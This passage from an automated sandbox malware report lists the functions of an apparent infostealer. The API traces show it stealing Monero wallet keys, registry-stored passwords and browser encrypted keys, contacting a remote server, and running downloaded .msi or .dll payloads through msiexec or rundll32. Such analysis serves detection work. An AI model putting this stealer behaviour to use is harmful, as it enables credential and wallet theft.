                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell$lstrcpy
                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                              • API String ID: 2507796910-3625054190
                              • Opcode ID: 9627090bddf08f7d978563fd09183734cf767a55164d72d2b1c62bfda28d9cb8
                              • Instruction ID: cabcc1c4dd62a876ca5786acfc4b572edb81c73d793de80598b52e2ebee0bb39
                              • Opcode Fuzzy Hash: 9627090bddf08f7d978563fd09183734cf767a55164d72d2b1c62bfda28d9cb8
                              • Instruction Fuzzy Hash: 11120171850118DADB05EBA0DC92FDEB778AF24302F904259F9267A191EF742B4ECF52
                              Function 001552C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0015A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0015A7E6
                                • Part of subcall function 00146280: InternetOpenA.WININET(00160DFE,00000001,00000000,00000000,00000000), ref: 001462E1
                                • Part of subcall function 00146280: StrCmpCA.SHLWAPI(?,00DDEAA0), ref: 00146303
                                • Part of subcall function 00146280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00146335
                                • Part of subcall function 00146280: HttpOpenRequestA.WININET(00000000,GET,?,00DDE578,00000000,00000000,00400100,00000000), ref: 00146385
                                • Part of subcall function 00146280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001463BF
                                • Part of subcall function 00146280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001463D1
                                • Part of subcall function 0015A8A0: lstrcpy.KERNEL32(?,00160E17), ref: 0015A905
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00155318
                              • lstrlen.KERNEL32(00000000), ref: 0015532F
                                • Part of subcall function 00158E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00158E52
                              • StrStrA.SHLWAPI(00000000,00000000), ref: 00155364
                              • lstrlen.KERNEL32(00000000), ref: 00155383
                              • lstrlen.KERNEL32(00000000), ref: 001553AE
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 3240024479-1526165396
                              • Opcode ID: 1c5feed6aa0606758e54b214675115a0e6b5224d4ea4806cbc787ff929327af0
                              • Instruction ID: de4830fc4e83f047a8536932b4c9c3996703d8f1c65d58810fdb0b6c2bf86249
                              • Opcode Fuzzy Hash: 1c5feed6aa0606758e54b214675115a0e6b5224d4ea4806cbc787ff929327af0
                              • Instruction Fuzzy Hash: B851CC70950148EBDB18EF60CD96AED7779BF24302F904118FC165E5A2EF346B49CBA2
                              Function 001512D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: c9d73e6e623a3623f7ab5471825696b20402979a482f6697f8b5f355f8d3ec9a
                              • Instruction ID: 2bf4cc6488d69dc1932553446ea839ac9b4c85034c776f6bf0306dd4e27a442e
                              • Opcode Fuzzy Hash: c9d73e6e623a3623f7ab5471825696b20402979a482f6697f8b5f355f8d3ec9a
                              • Instruction Fuzzy Hash: 09C195B5940209DBCB14EF60DC89FEA7778BF64305F0045D9F91AAB141EB70AA89CF91
                              Function 00154280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00158DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00158E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 001542EC
                              • lstrcat.KERNEL32(?,00DDE488), ref: 0015430B
                              • lstrcat.KERNEL32(?,?), ref: 0015431F
                              • lstrcat.KERNEL32(?,00DDD5C8), ref: 00154333
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                                • Part of subcall function 00158D90: GetFileAttributesA.KERNEL32(00000000,?,00141B54,?,?,0016564C,?,?,00160E1F), ref: 00158D9F
                                • Part of subcall function 00149CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00149D39
                                • Part of subcall function 001499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001499EC
                                • Part of subcall function 001499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00149A11
                                • Part of subcall function 001499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00149A31
                                • Part of subcall function 001499C0: ReadFile.KERNEL32(000000FF,?,00000000,0014148F,00000000), ref: 00149A5A
                                • Part of subcall function 001499C0: LocalFree.KERNEL32(0014148F), ref: 00149A90
                                • Part of subcall function 001499C0: CloseHandle.KERNEL32(000000FF), ref: 00149A9A
                                • Part of subcall function 001593C0: GlobalAlloc.KERNEL32(00000000,001543DD,001543DD), ref: 001593D3
                              • StrStrA.SHLWAPI(?,00DDE350), ref: 001543F3
                              • GlobalFree.KERNEL32(?), ref: 00154512
                                • Part of subcall function 00149AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00144EEE,00000000,00000000), ref: 00149AEF
                                • Part of subcall function 00149AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00144EEE,00000000,?), ref: 00149B01
                                • Part of subcall function 00149AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00144EEE,00000000,00000000), ref: 00149B2A
                                • Part of subcall function 00149AC0: LocalFree.KERNEL32(?,?,?,?,00144EEE,00000000,?), ref: 00149B3F
                              • lstrcat.KERNEL32(?,00000000), ref: 001544A3
                              • StrCmpCA.SHLWAPI(?,001608D1), ref: 001544C0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 001544D2
                              • lstrcat.KERNEL32(00000000,?), ref: 001544E5
                              • lstrcat.KERNEL32(00000000,00160FB8), ref: 001544F4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                              • String ID:
                              • API String ID: 3541710228-0
                              • Opcode ID: 26016f3c79f69b4b41a127eb4c3587bbac8d74f190ac60f90f902cb0b8e84496
                              • Instruction ID: dd01a37b42610de0c3cffaad58426d95e26d241a170af6792f9dc54a313beb06
                              • Opcode Fuzzy Hash: 26016f3c79f69b4b41a127eb4c3587bbac8d74f190ac60f90f902cb0b8e84496
                              • Instruction Fuzzy Hash: 117175B6900218ABDB14EBA0DC85FEE777DAF98305F004598F615A7181EB34DB49CBA1
                              Function 00141310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001412A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001412B4
                                • Part of subcall function 001412A0: RtlAllocateHeap.NTDLL(00000000), ref: 001412BB
                                • Part of subcall function 001412A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 001412D7
                                • Part of subcall function 001412A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001412F5
                                • Part of subcall function 001412A0: RegCloseKey.ADVAPI32(?), ref: 001412FF
                              • lstrcat.KERNEL32(?,00000000), ref: 0014134F
                              • lstrlen.KERNEL32(?), ref: 0014135C
                              • lstrcat.KERNEL32(?,.keys), ref: 00141377
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                                • Part of subcall function 0015A9B0: lstrlen.KERNEL32(?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 0015A9C5
                                • Part of subcall function 0015A9B0: lstrcpy.KERNEL32(00000000), ref: 0015AA04
                                • Part of subcall function 0015A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0015AA12
                                • Part of subcall function 0015A8A0: lstrcpy.KERNEL32(?,00160E17), ref: 0015A905
                                • Part of subcall function 00158B60: GetSystemTime.KERNEL32(00160E1A,00DDA988,001605AE,?,?,001413F9,?,0000001A,00160E1A,00000000,?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 00158B86
                                • Part of subcall function 0015A920: lstrcpy.KERNEL32(00000000,?), ref: 0015A972
                                • Part of subcall function 0015A920: lstrcat.KERNEL32(00000000), ref: 0015A982
                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00141465
                                • Part of subcall function 0015A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0015A7E6
                                • Part of subcall function 001499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001499EC
                                • Part of subcall function 001499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00149A11
                                • Part of subcall function 001499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00149A31
                                • Part of subcall function 001499C0: ReadFile.KERNEL32(000000FF,?,00000000,0014148F,00000000), ref: 00149A5A
                                • Part of subcall function 001499C0: LocalFree.KERNEL32(0014148F), ref: 00149A90
                                • Part of subcall function 001499C0: CloseHandle.KERNEL32(000000FF), ref: 00149A9A
                              • DeleteFileA.KERNEL32(00000000), ref: 001414EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                              • API String ID: 3478931302-218353709
                              • Opcode ID: 8c7ef575fe52235f9b6274778e77e7011cf078cefbf2ad5a0d88e2bc7fb3e42b
                              • Instruction ID: 5dc6d9c06bfe7e2c1ef87927c06ffb16b2ab8acfdb9c054f0d718973dc41999d
                              • Opcode Fuzzy Hash: 8c7ef575fe52235f9b6274778e77e7011cf078cefbf2ad5a0d88e2bc7fb3e42b
                              • Instruction Fuzzy Hash: 1E5145B1D9011897CB15FB60DD92FED733CAF64301F8042D8B61A66091EF746B89CBA6
                              Function 001475D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001472D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0014733A
                                • Part of subcall function 001472D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 001473B1
                                • Part of subcall function 001472D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0014740D
                                • Part of subcall function 001472D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00147452
                                • Part of subcall function 001472D0: HeapFree.KERNEL32(00000000), ref: 00147459
                              • lstrcat.KERNEL32(00000000,001617FC), ref: 00147606
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00147648
                              • lstrcat.KERNEL32(00000000, : ), ref: 0014765A
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0014768F
                              • lstrcat.KERNEL32(00000000,00161804), ref: 001476A0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 001476D3
                              • lstrcat.KERNEL32(00000000,00161808), ref: 001476ED
                              • task.LIBCPMTD ref: 001476FB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                              • String ID: :
                              • API String ID: 2677904052-3653984579
                              • Opcode ID: d0ccdc23816f45296554534dc1e513075c50c1646a55bb65109639d1f8943ae8
                              • Instruction ID: 83453153b72b10879cdcc95a14e5cccec35eeedc1c43ddccf3bdb993c7c5a047
                              • Opcode Fuzzy Hash: d0ccdc23816f45296554534dc1e513075c50c1646a55bb65109639d1f8943ae8
                              • Instruction Fuzzy Hash: 1C31AC71900609EFDB09EBB4DC95DFE7779BB54302F14415AF102A72A1EB34A906CB62
                              Function 00158100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00DDE2A8,00000000,?,00160E2C,00000000,?,00000000), ref: 00158130
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00158137
                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00158158
                              • __aulldiv.LIBCMT ref: 00158172
                              • __aulldiv.LIBCMT ref: 00158180
                              • wsprintfA.USER32 ref: 001581AC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB$@
                              • API String ID: 2774356765-3474575989
                              • Opcode ID: e3b062b2fca364a9fb0d08faf814d91dc42e38c7659675ad028eadaf7a7cc98e
                              • Instruction ID: 4c8cddf6da9ff967e8d149f1d90a032d76a577cfc035bac566cda7543784ff3b
                              • Opcode Fuzzy Hash: e3b062b2fca364a9fb0d08faf814d91dc42e38c7659675ad028eadaf7a7cc98e
                              • Instruction Fuzzy Hash: 892129B1A44608ABEB10DFD4DC49FAEB7B8EB44B01F104109F615BB280D77859058BA5
                              Function 001460A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0015A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0015A7E6
                                • Part of subcall function 001447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00144839
                                • Part of subcall function 001447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00144849
                              • InternetOpenA.WININET(00160DF7,00000001,00000000,00000000,00000000), ref: 0014610F
                              • StrCmpCA.SHLWAPI(?,00DDEAA0), ref: 00146147
                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0014618F
                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 001461B3
                              • InternetReadFile.WININET(?,?,00000400,?), ref: 001461DC
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0014620A
                              • CloseHandle.KERNEL32(?,?,00000400), ref: 00146249
                              • InternetCloseHandle.WININET(?), ref: 00146253
                              • InternetCloseHandle.WININET(00000000), ref: 00146260
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                              • String ID:
                              • API String ID: 2507841554-0
                              • Opcode ID: 56ce5e5f4777ab8b0375187dfac04d80ca5f7dc71a907b98243fc305f337be23
                              • Instruction ID: c68a5a22678f4fd1fa5f43526eb1e5a7d741584d435117c8637379d8c7e47f3a
                              • Opcode Fuzzy Hash: 56ce5e5f4777ab8b0375187dfac04d80ca5f7dc71a907b98243fc305f337be23
                              • Instruction Fuzzy Hash: 3B5170B1940708ABEB20DFA0DC45BEE77B8FF44705F108199B605A71D0DBB46A89CF96
                              Function 001472D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0014733A
                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 001473B1
                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0014740D
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00147452
                              • HeapFree.KERNEL32(00000000), ref: 00147459
                              • task.LIBCPMTD ref: 00147555
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
